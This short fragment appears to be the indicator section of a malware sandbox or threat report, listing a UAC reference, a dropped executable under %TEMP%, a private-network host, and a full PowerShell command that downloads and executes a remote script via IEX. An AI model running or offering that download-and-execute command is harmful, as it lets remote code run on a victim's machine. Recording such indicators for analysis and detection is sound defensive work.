Technical Information
- User Account Control (UAC)
- http://19#.#68.1.101/powershell_attack.txt
- %TEMP%\5400\5400.exe
- %TEMP%\5400\5400.exe
- '<LOCALNET>.1.101':80
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe "IEX ((new-object net.webclient).downloadstring('http://19#.#68.1.101/powershell_attack.txt '))"